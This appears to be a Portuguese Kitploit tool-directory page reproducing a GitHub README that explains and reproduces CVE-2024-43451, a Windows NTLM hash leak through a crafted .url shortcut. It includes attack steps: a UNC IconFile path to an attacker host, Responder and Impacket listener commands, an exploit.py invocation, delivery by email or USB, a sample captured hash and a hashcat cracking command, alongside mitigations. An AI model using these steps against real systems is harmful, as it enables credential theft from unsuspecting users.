Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — Reprodução de CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
Ferramentas/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Quebra de SenhasFerramentas de PhishingReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

Reprodução de CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction

Ver Repositório
6há 1 mêsAinda não revisado

CVE-2024-43451 — Vulnerabilidade de Spoofing de Divulgação de Hash NTLM do Windows

Visão Geral

A CVE-2024-43451 é uma vulnerabilidade de spoofing de divulgação de hash NTLMv2 no Windows. Ela permite que um atacante remoto não autenticado vaze o hash NTLM de uma vítima ao convencê-la a interagir com um arquivo de atalho .url malicioso. A vulnerabilidade é acionada com interação mínima do usuário — bastar clicar com o botão direito, excluir ou mover o arquivo para vazar o hash. Ela possui pontuação CVSS de 6.5 (Média) e tem sido explorada ativamente na natureza. A CISA a adicionou ao catálogo de Vulnerabilidades Conhecidas Exploradas (KEV).

Detalhes Técnicos

Autenticação NTLM

NTLM (NT LAN Manager) é um protocolo de autenticação de desafio-resposta usado pelo Windows. Quando um cliente tenta acessar um recurso via SMB, o cliente e o servidor realizam um handshake:

  1. O cliente envia uma NEGOTIATE_MESSAGE contendo as capacidades suportadas.
  2. O servidor responde com uma CHALLENGE_MESSAGE contendo um nonce de 8 bytes (desafio do servidor).
  3. O cliente responde com uma AUTHENTICATE_MESSAGE contendo o hash NTLMv2 — um HMAC-MD5 do desafio combinado com o hash da senha do usuário, nome de usuário e domínio.

Se um atacante puder observar ou disparar uma tentativa de autenticação NTLM para uma máquina que ele controla, a AUTHENTICATE_MESSAGE capturada pode ser quebrada offline para recuperar a senha em texto puro.

Formato de Arquivo .url

Um arquivo .url é um arquivo de atalho usado pelo Internet Explorer e pelo Windows Explorer para armazenar links. É um arquivo formatado em INI com uma seção [InternetShortcut]. Os campos críticos para exploração são:

  • URL= — a URL de destino que o Windows abrirá.
  • IconFile= — um caminho UNC opcional para um recurso de ícone. Quando o Windows Explorer renderiza o arquivo, ele tenta automaticamente recuperar o ícone do compartilhamento remoto, disparando uma tentativa de autenticação NTLM para o servidor do atacante.

Vetor de Ataque

O atacante cria um arquivo .url com um parâmetro IconFile apontando para \\attacker-ip\share\icon.ico. Quando a vítima:

  • Clica com o botão direito no arquivo (o Windows Explorer busca o ícone para o menu de contexto),
  • Move ou copia o arquivo (o ícone é relido), ou
  • Exclui o arquivo (o ícone é buscado para o diálogo da lixeira),

O Windows Explorer tenta carregar o ícone do caminho UNC, enviando o hash NTLMv2 da vítima para o listener SMB do atacante (ex.: Responder).

Versões Afetadas

Todas as versões suportadas do Windows anteriores à atualização de Patch Tuesday de novembro de 2024:

  • Windows 10 (todas as versões)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • Versões antigas sem suporte também são provavelmente vulneráveis, mas não receberão patches.

Configuração da Exploração

Requisitos

  • Máquina do atacante: Linux ou Windows com uma ferramenta de captura SMB (ex.: Responder, smbserver do Impacket ou Inveigh).
  • Máquina da vítima: Qualquer sistema Windows sem patch.
  • Acesso à rede: A vítima deve conseguir alcançar o IP do atacante na porta 445 (SMB).

Ferramentas

FerramentaDescrição
ResponderEnvenenador LLMNR/NBT-NS/mDNS com servidor SMB integrado para captura de hashes
Impacket

Etapas de Reprodução

1. Inicie o listener SMB (máquina do atacante)

Usando o Responder:

root@kitploit:~
sudo responder -I eth0 -v

Ou usando o Impacket:

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. Gere o arquivo .url malicioso

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. Entregue o arquivo à vítima

  • Anexo de e-mail, pendrive USB, compartilhamento de arquivos ou download pela web.

4. Interação da vítima

Qualquer uma das seguintes ações dispara o vazamento do hash:

  • Clique com o botão direito → o ícone é buscado para o menu de contexto → handshake NTLM enviado ao atacante
  • Excluir → o ícone é buscado para o diálogo de confirmação
  • Mover/Copiar → o ícone é relido do caminho UNC
  • Simplesmente visualizar a pasta no modo Detalhes ou Ícones (carregamento do ícone)

5. Capture o hash

O listener SMB do atacante recebe um hash NTLMv2:

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. Quebre o hash (offline)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

Prova de Conceito

root@kitploit:~
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
#   \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.

Mitigação

Referências

  • Microsoft Security Response Center — CVE-2024-43451
  • Catálogo de Vulnerabilidades Conhecidas Exploradas da CISA
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — ataques direcionados à Ucrânia
  • Análise da campanha UAC-0194 / SparkRAT
Baixar ferramenta
smbserver.py pode ser usado para hospedar um compartilhamento SMB simples
InveighFerramenta de captura NTLM baseada em PowerShell para Windows
MitigaçãoDescrição
Aplicar o patch de novembro de 2024Instalar a atualização de segurança da Microsoft de KB5044285
Bloquear SMB de saída (porta 445)Impedir que hashes NTLM deixem o perímetro da rede
Desabilitar NTLM quando possívelUsar autenticação somente Kerberos
Habilitar assinatura SMBImpede ataques de relay mesmo se os hashes forem capturados
Treinamento de conscientização do usuárioEducar os usuários a não interagir com arquivos .url inesperados
Restringir o manuseio de arquivos .urlUsar Política de Grupo para bloquear a execução ou o envio de arquivos .url por e-mail